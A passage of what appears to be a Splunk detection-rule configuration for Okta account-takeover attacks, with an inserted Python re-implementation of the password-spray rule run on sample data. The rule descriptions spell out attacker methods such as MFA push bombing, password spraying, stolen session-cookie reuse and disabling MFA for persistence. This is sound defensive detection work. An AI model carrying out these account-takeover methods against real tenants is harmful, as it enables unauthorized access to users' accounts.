Drop to anomaly until tuning is complete. action.escu.creation_date = 2022-09-27 action.escu.modification_date = 2022-09-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta MFA Exhaustion Hunt - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover", "Okta MFA Exhaustion"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta MFA Exhaustion Hunt - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover", "Okta MFA Exhaustion"], "cis20": ["CIS 10"], "confidence": 60, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType=system.push.send_factor_verify_push OR ((legacyEventType=core.user.factor.attempt_success) AND (debugContext.debugData.factor=OKTA_VERIFY_PUSH)) OR ((legacyEventType=core.user.factor.attempt_fail) AND (debugContext.debugData.factor=OKTA_VERIFY_PUSH)) | stats count(eval(legacyEventType="core.user.factor.attempt_success")) as successes count(eval(legacyEventType="core.user.factor.attempt_fail")) as failures count(eval(eventType="system.push.send_factor_verify_push")) as pushes by user,_time | stats latest(_time) as lasttime earliest(_time) as firsttime sum(successes) as successes sum(failures) as failures sum(pushes) as pushes by user | eval seconds=lasttime-firsttime | eval lasttime=strftime(lasttime, "%c") | search (pushes>1) | eval totalattempts=successes+failures | eval finding="Normal authentication pattern" | eval 
finding=if(failures==pushes AND pushes>1,"Authentication attempts not successful because multiple pushes denied",finding) | eval finding=if(totalattempts==0,"Multiple pushes sent and ignored",finding) | eval finding=if(successes>0 AND pushes>3,"Probably should investigate. Multiple pushes sent, eventual successful authentication!",finding) | `okta_mfa_exhaustion_hunt_filter` [ESCU - Okta Mismatch Between Source and Response for Verify Push Request - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies variations in client-based values for source and response events to identify suspicious request behavior. The detection is enhanced if the org is evaluating behavior conditions in sign-on policies using Okta Behavior Detection. NOTE: This detection requires the use of Okta Identity Engine (OIE) and will not function on Okta Classic.\ For each Okta Verify Push challenge, the following two events are recorded in Okta System Log \ Source of Push (Sign-In) \ eventType eq \"system.push.send_factor_verify_push\" \ User Push Response (Okta Verify client) \ eventType eq "user.authentication.auth_via_mfa" AND debugContext.debugData.factor eq "OKTA_VERIFY_PUSH" \ In sequence, the logic for the analytic - \ * Groups by SessionID and retrieves any system.push.send_factor_verify_push events (the source of the push) and user.authentication.auth_via_mfa events where the factor is OKTA_VERIFY_PUSH - (the user response to the push) \ * Counts the total number of push events, successful authentication events, and any push sources where the client is a new device. 
\ * Creates a ratio of successful sign-ins to pushes. \ * If the ratio (currently tuned aggressively) indicates push spam, or if a user has rejected a push, the detection proceeds to evaluate whether there is more than one IP address used during the session (session roaming) and the presence of both a new IP and new device during the session. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1621"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies variations in client-based values for source and response events to identify suspicious request behavior. The detection is enhanced if the org is evaluating behavior conditions in sign-on policies using Okta Behavior Detection. NOTE: This detection requires the use of Okta Identity Engine (OIE) and will not function on Okta Classic.\ For each Okta Verify Push challenge, the following two events are recorded in Okta System Log \ Source of Push (Sign-In) \ eventType eq \"system.push.send_factor_verify_push\" \ User Push Response (Okta Verify client) \ eventType eq "user.authentication.auth_via_mfa" AND debugContext.debugData.factor eq "OKTA_VERIFY_PUSH" \ In sequence, the logic for the analytic - \ * Groups by SessionID and retrieves any system.push.send_factor_verify_push events (the source of the push) and user.authentication.auth_via_mfa events where the factor is OKTA_VERIFY_PUSH - (the user response to the push) \ * Counts the total number of push events, successful authentication events, and any push sources where the client is a new device. \ * Creates a ratio of successful sign-ins to pushes. \ * If the ratio (currently tuned aggressively) indicates push spam, or if a user has rejected a push, the detection proceeds to evaluate whether there is more than one IP address used during the session (session roaming) and the presence of both a new IP and new device during the session. 
action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = False positives may be present based on organization size and configuration of Okta. Monitor, tune and filter as needed. action.escu.creation_date = 2023-03-17 action.escu.modification_date = 2023-03-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Mismatch Between Source and Response for Verify Push Request - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover", "Okta MFA Exhaustion"] action.risk = 1 action.risk.param._risk_message = A mismatch between source and response for verifying a push request has occurred for $actor.alternateId$ action.risk.param._risk = [{"risk_object_field": "actor.alternateId", "risk_object_type": "user", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Okta Mismatch Between Source and Response for Verify Push Request - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover", "Okta MFA Exhaustion"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1621"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies variations in client-based values for source and response events to identify suspicious request behavior. 
The detection is enhanced if the org is evaluating behavior conditions in sign-on policies using Okta Behavior Detection. NOTE: This detection requires the use of Okta Identity Engine (OIE) and will not function on Okta Classic.\ For each Okta Verify Push challenge, the following two events are recorded in Okta System Log \ Source of Push (Sign-In) \ eventType eq \"system.push.send_factor_verify_push\" \ User Push Response (Okta Verify client) \ eventType eq "user.authentication.auth_via_mfa" AND debugContext.debugData.factor eq "OKTA_VERIFY_PUSH" \ In sequence, the logic for the analytic - \ * Groups by SessionID and retrieves any system.push.send_factor_verify_push events (the source of the push) and user.authentication.auth_via_mfa events where the factor is OKTA_VERIFY_PUSH - (the user response to the push) \ * Counts the total number of push events, successful authentication events, and any push sources where the client is a new device. \ * Creates a ratio of successful sign-ins to pushes. \ * If the ratio (currently tuned aggressively) indicates push spam, or if a user has rejected a push, the detection proceeds to evaluate whether there is more than one IP address used during the session (session roaming) and the presence of both a new IP and new device during the session. 
action.notable.param.rule_title = Okta Mismatch Between Source and Response for Verify Push Request action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType IN (system.push.send_factor_verify_push) OR (eventType IN (user.authentication.auth_via_mfa) debugContext.debugData.factor="OKTA_VERIFY_PUSH") | eval groupby="authenticationContext.externalSessionId" | eval group_push_time=_time | bin span=2s group_push_time | fillnull value=NULL | stats min(_time) as _time by authenticationContext.externalSessionId eventType debugContext.debugData.factor outcome.result actor.alternateId client.device client.ipAddress client.userAgent.rawUserAgent debugContext.debugData.behaviors group_push_time groupby | iplocation client.ipAddress | fields - lat, lon, group_push_time | stats min(_time) as _time dc(client.ipAddress) as dc_ip sum(eval(if(eventType="system.push.send_factor_verify_push" AND "outcome.result"="SUCCESS",1,0))) as total_pushes sum(eval(if(eventType="user.authentication.auth_via_mfa" AND "outcome.result"="SUCCESS",1,0))) as total_successes sum(eval(if(eventType="user.authentication.auth_via_mfa" AND "outcome.result"="FAILURE",1,0))) as total_rejected sum(eval(if(eventType="system.push.send_factor_verify_push" AND "debugContext.debugData.behaviors" LIKE "%New Device=POSITIVE%",1,0))) as suspect_device_from_source sum(eval(if(eventType="system.push.send_factor_verify_push" AND "debugContext.debugData.behaviors" LIKE "%New IP=POSITIVE%",0,0))) as suspect_ip_from_source values(eval(if(eventType="system.push.send_factor_verify_push","client.ipAddress",""))) as src values(eval(if(eventType="user.authentication.auth_via_mfa","client.ipAddress",""))) as dest values(*) as * by groupby | eval ratio = round(total_successes/total_pushes,2) | search 
((ratio < 0.5 AND total_pushes > 1) OR (total_rejected > 0)) AND dc_ip > 1 AND suspect_device_from_source > 0 AND suspect_ip_from_source > 0 | `okta_mismatch_between_source_and_response_for_verify_push_request_filter` [ESCU - Okta Multi-Factor Authentication Disabled - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an attempt to disable multi-factor authentication for an Okta user. An adversary who has obtained access to an Okta tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556", "T1556.006"], "nist": ["DE.CM"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic identifies an attempt to disable multi-factor authentication for an Okta user. An adversary who has obtained access to an Okta tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = Legitimate use case may require for users to disable MFA. Filter lightly and monitor for any unusual activity. 
action.escu.creation_date = 2024-03-11 action.escu.modification_date = 2024-03-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Multi-Factor Authentication Disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = MFA was disabled for User [$user$] initiated by [$src$]. Investigate further to determine if this was authorized. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 30}, {"threat_object_field": "src", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta Multi-Factor Authentication Disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556", "T1556.006"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an attempt to disable multi-factor authentication for an Okta user. An adversary who has obtained access to an Okta tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. 
action.notable.param.rule_title = Okta Multi-Factor Authentication Disabled action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count max(_time) as lastTime, min(_time) as firstTime from datamodel=Change where sourcetype="OktaIM2:log" All_Changes.object_category=User AND All_Changes.action=modified All_Changes.command=user.mfa.factor.deactivate by All_Changes.user All_Changes.result All_Changes.command sourcetype All_Changes.src | `drop_dm_object_name("All_Changes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_multi_factor_authentication_disabled_filter` [ESCU - Okta Multiple Accounts Locked Out - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes the user.acount.lock event to identify multiple Okta accounts locking out in a short period of time. An adversary attempting to brute force or password spray account names may lock accounts out depending on the threshold set by the organization. Monitoring for multiple account lockouts can help detect potential account takeover attempts or unauthorized access to Okta accounts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic utilizes the user.acount.lock event to identify multiple Okta accounts locking out in a short period of time. An adversary attempting to brute force or password spray account names may lock accounts out depending on the threshold set by the organization. Monitoring for multiple account lockouts can help detect potential account takeover attempts or unauthorized access to Okta accounts. 
action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = Multiple account lockouts may be also triggered by an application malfunction. Filter as needed, and monitor for any unusual activity. action.escu.creation_date = 2024-03-06 action.escu.modification_date = 2024-03-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Multiple Accounts Locked Out - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = Multiple accounts locked out in Okta from [$src$]. Investigate further to determine if this was authorized. action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta Multiple Accounts Locked Out - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count max(_time) as lastTime, min(_time) as firstTime values(All_Changes.user) as user from datamodel=Change where All_Changes.change_type=AAA 
All_Changes.object_category=User AND All_Changes.action=modified AND All_Changes.command=user.account.lock by _time span=5m All_Changes.result All_Changes.command sourcetype All_Changes.src | where count > 5 | `drop_dm_object_name("All_Changes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_multiple_accounts_locked_out_filter` [ESCU - Okta Multiple Failed MFA Requests For User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies multiple failed multi-factor authentication requests for a single user within an Okta tenant. Specifically, the analytic triggers when more than 10 MFA user prompts fail within 10 minutes. The reasons for these failure could be several, like the user not responding in time or receiving multiple duplicate MFA requests. Okta tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1621"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies multiple failed multi-factor authentication requests for a single user within an Okta tenant. Specifically, the analytic triggers when more than 10 MFA user prompts fail within 10 minutes. The reasons for these failure could be several, like the user not responding in time or receiving multiple duplicate MFA requests. 
Okta tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = Multiple Failed MFA requests may also be a sign of authentication or application issues. Filter as needed and monitor for any unusual activity. action.escu.creation_date = 2024-03-05 action.escu.modification_date = 2024-03-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Multiple Failed MFA Requests For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = Multiple failed MFA requests for user [$src_user$] from IP Address - [$src_ip$]. Investigate further to determine if this was authorized. 
action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "src_user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta Multiple Failed MFA Requests For User - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1621"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType=user.authentication.auth_via_mfa outcome.result=FAILURE debugContext.debugData.factor!=PASSWORD_AS_FACTOR | bucket _time span=5m | stats count min(_time) as firstTime max(_time) as lastTime values(displayMessage) values(src_ip) as src_ip values(debugContext.debugData.factor) by _time src_user | where count >= 5 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_multiple_failed_mfa_requests_for_user_filter` [ESCU - Okta Multiple Failed Requests to Access Applications - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies multiple failed app requests in an attempt to identify the reuse a stolen web session cookie. 
The logic of the analytic is as follows: \ * Retrieves policy evaluation and SSO details in events that contain the Application requested \ * Formats target fields so we can aggregate specifically on Applications (AppInstances) \ * Groups by User, Session and IP \ * Creates a ratio of successful SSO events to total MFA challenges related to Application Sign On Policies \ * Alerts when more than half of app sign on events are unsuccessful, and challenges were unsatisfied for more than three apps. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550.004", "T1538"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies multiple failed app requests in an attempt to identify the reuse a stolen web session cookie. The logic of the analytic is as follows: \ * Retrieves policy evaluation and SSO details in events that contain the Application requested \ * Formats target fields so we can aggregate specifically on Applications (AppInstances) \ * Groups by User, Session and IP \ * Creates a ratio of successful SSO events to total MFA challenges related to Application Sign On Policies \ * Alerts when more than half of app sign on events are unsuccessful, and challenges were unsatisfied for more than three apps. action.escu.how_to_implement = This analytic is specific to Okta and requires Okta:im2 logs to be ingested. action.escu.known_false_positives = False positives may be present based on organization size and configuration of Okta. 
action.escu.creation_date = 2023-03-17 action.escu.modification_date = 2023-03-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Multiple Failed Requests to Access Applications - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Okta Multiple Failed Requests to Access Applications - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550.004", "T1538"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` target{}.type=AppInstance (eventType=policy.evaluate_sign_on outcome.result=CHALLENGE) OR (eventType=user.authentication.sso outcome.result=SUCCESS) | eval targets=mvzip('target{}.type', 'target{}.displayName', ": ") | eval targets=mvfilter(targets LIKE "AppInstance%") | stats count min(_time) as _time values(outcome.result) as outcome.result dc(eval(if(eventType="policy.evaluate_sign_on",targets,NULL))) as total_challenges sum(eval(if(eventType="user.authentication.sso",1,0))) as total_successes by authenticationContext.externalSessionId targets actor.alternateId client.ipAddress | search total_challenges > 0 | stats min(_time) as _time values(*) as * sum(total_challenges) as total_challenges sum(total_successes) as total_successes values(eval(if("outcome.result"="SUCCESS",targets,NULL))) as success_apps 
values(eval(if(":outcome.result"!="SUCCESS",targets,NULL))) as no_success_apps by authenticationContext.externalSessionId actor.alternateId client.ipAddress | fillnull | eval ratio=round(total_successes/total_challenges,2), severity="HIGH", mitre_technique_id="T1538", description="actor.alternateId". " from " . "client.ipAddress" . " seen opening " . total_challenges . " chiclets/apps with " . total_successes . " challenges successfully passed" | fields - count, targets | search ratio < 0.5 total_challenges > 2 | `okta_multiple_failed_requests_to_access_applications_filter` [ESCU - Okta Multiple Users Failing To Authenticate From Ip - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies instances where multiple users (more than 10 unique accounts) have failed to authenticate from a single IP address within a short time span (5 minutes) within an Okta tenant. Such a pattern can be indicative of malicious activities, such as brute-force attacks or password spraying attempts. Identifying and responding to such patterns promptly is crucial to prevent potential account compromises and unauthorized access to organizational resources. If the detection is a true positive, it suggests that an external entity is actively trying to breach security by targeting multiple user accounts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This analytic identifies instances where multiple users (more than 10 unique accounts) have failed to authenticate from a single IP address within a short time span (5 minutes) within an Okta tenant. Such a pattern can be indicative of malicious activities, such as brute-force attacks or password spraying attempts. Identifying and responding to such patterns promptly is crucial to prevent potential account compromises and unauthorized access to organizational resources. 
If the detection is a true positive, it suggests that an external entity is actively trying to breach security by targeting multiple user accounts. action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = A source Ip failing to authenticate with multiple users in a short period of time is not common legitimate behavior. action.escu.creation_date = 2024-03-06 action.escu.modification_date = 2024-03-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Multiple Users Failing To Authenticate From Ip - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = Multiple users failing to authenticate from a single source IP Address - [$src$]. Investigate further to determine if this was authorized. 
action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta Multiple Users Failing To Authenticate From Ip - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count max(_time) as lastTime, min(_time) as firstTime dc(Authentication.user) as unique_accounts values(Authentication.signature) as signature values(Authentication.user) as user values(Authentication.app) as app values(Authentication.authentication_method) as authentication_method from datamodel=Authentication where Authentication.action="failure" AND Authentication.signature=user.session.start by _time span=5m Authentication.src sourcetype | where unique_accounts > 9 | `drop_dm_object_name("Authentication")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_multiple_users_failing_to_authenticate_from_ip_filter` [ESCU - Okta New API Token Created - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies when a new API token is created within an Okta tenant. An adversary may create a new API token to maintain persistence within the environment. Monitoring for new API tokens can help detect potential account takeover attempts or unauthorized access to Okta accounts. 
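The "Okta Multiple Users Failing To Authenticate From Ip" search above groups failed user.session.start events into fixed five-minute buckets per source IP (`by _time span=5m Authentication.src`) and fires when ten or more distinct accounts fail inside one bucket (`unique_accounts > 9`). The Python below is an added example, not code from the Splunk Threat Research Team or the ESCU app: it re-implements that logic over constructed Okta System Log events (the event shapes, IP addresses and user names are assumptions made for the example) so the threshold can be tested offline, and adds a sliding-window variant to show the case the fixed bucketing misses, a spray whose failures straddle a bucket boundary.

```python
# Added example (not from the Splunk Threat Research Team or the ESCU app):
# the "Okta Multiple Users Failing To Authenticate From Ip" logic in Python
# over constructed Okta System Log events.
from collections import defaultdict
from datetime import datetime, timezone

THRESHOLD = 10   # ESCU: `where unique_accounts > 9`
WINDOW = 300     # seconds; ESCU: `by _time span=5m Authentication.src`


def to_epoch(published):
    """Okta 'published' timestamps look like 2024-04-01T12:00:05.123Z (UTC)."""
    return datetime.strptime(published, "%Y-%m-%dT%H:%M:%S.%fZ").replace(
        tzinfo=timezone.utc).timestamp()


def failed_logins(events):
    """Yield (epoch, src_ip, user) for failed user.session.start events.

    The Authentication data model maps actor.alternateId to user and
    client.ipAddress to src; outcome.result=FAILURE becomes action=failure.
    """
    for e in events:
        if e["eventType"] != "user.session.start":
            continue
        if e["outcome"]["result"] != "FAILURE":
            continue
        yield to_epoch(e["published"]), e["client"]["ipAddress"], e["actor"]["alternateId"]


def spray_sources_fixed(events, threshold=THRESHOLD, window=WINDOW):
    """Fixed buckets, which is what `_time span=5m` does in tstats.

    Returns {(bucket_start_epoch, src_ip): sorted distinct users} for every
    bucket in which one IP failed against at least `threshold` accounts.
    """
    users = defaultdict(set)
    for ts, ip, user in failed_logins(events):
        bucket = int(ts // window) * window
        users[(bucket, ip)].add(user)
    return {k: sorted(v) for k, v in users.items() if len(v) >= threshold}


def spray_sources_sliding(events, threshold=THRESHOLD, window=WINDOW):
    """Sliding window per IP: catches a spray that straddles a bucket edge.

    Fixed buckets split a burst running from 12:04 to 12:06 into two halves
    that may each sit under the threshold; a sliding window does not.
    """
    by_ip = defaultdict(list)
    for ts, ip, user in failed_logins(events):
        by_ip[ip].append((ts, user))
    hits = {}
    for ip, rows in by_ip.items():
        rows.sort()
        lo = 0
        for hi in range(len(rows)):
            while rows[hi][0] - rows[lo][0] > window:
                lo += 1
            distinct = {u for _, u in rows[lo:hi + 1]}
            if len(distinct) >= threshold:
                hits[ip] = sorted(distinct)
                break
    return hits


def _event(published, ip, user, result="FAILURE", event_type="user.session.start"):
    """Build a minimal, constructed Okta System Log event (sample data only)."""
    return {
        "eventType": event_type,
        "published": published,
        "actor": {"alternateId": user, "type": "User"},
        "client": {"ipAddress": ip},
        "outcome": {"result": result,
                    "reason": "INVALID_CREDENTIALS" if result == "FAILURE" else None},
    }


# Constructed sample: one spray inside a bucket, one spray across the 12:05
# bucket edge, one single-account brute force, and a successful login.
SAMPLE_EVENTS = (
    [_event(f"2024-04-01T12:00:{i:02d}.000Z", "203.0.113.5", f"user{i}@example.com") for i in range(10)]
    + [_event(f"2024-04-01T12:04:{30 + i * 5:02d}.000Z", "198.51.100.7", f"emp{i}@example.com") for i in range(5)]
    + [_event(f"2024-04-01T12:05:{i * 5:02d}.000Z", "198.51.100.7", f"emp{5 + i}@example.com") for i in range(5)]
    + [_event(f"2024-04-01T12:01:{i:02d}.000Z", "192.0.2.9", "ceo@example.com") for i in range(12)]
    + [_event("2024-04-01T12:02:00.000Z", "203.0.113.5", "user3@example.com", result="SUCCESS")]
)
```

With the constructed sample, spray_sources_fixed flags only 203.0.113.5; the sliding variant also flags 198.51.100.7, whose ten failures fall five on each side of the 12:05 bucket edge. The twelve failures from 192.0.2.9 against one account are not flagged by either, since this detection counts distinct users, not attempts. In Splunk the equivalent of the sliding variant is a wider span or a streamstats time window, at the cost of evaluating more events.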
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic identifies when a new API token is created within an Okta tenant. An adversary may create a new API token to maintain persistence within the environment. Monitoring for new API tokens can help detect potential account takeover attempts or unauthorized access to Okta accounts. action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = False positives may be present. Tune Okta and tune the analytic to ensure proper fidelity. Modify risk score as needed. action.escu.creation_date = 2022-09-21 action.escu.modification_date = 2022-09-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta New API Token Created - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 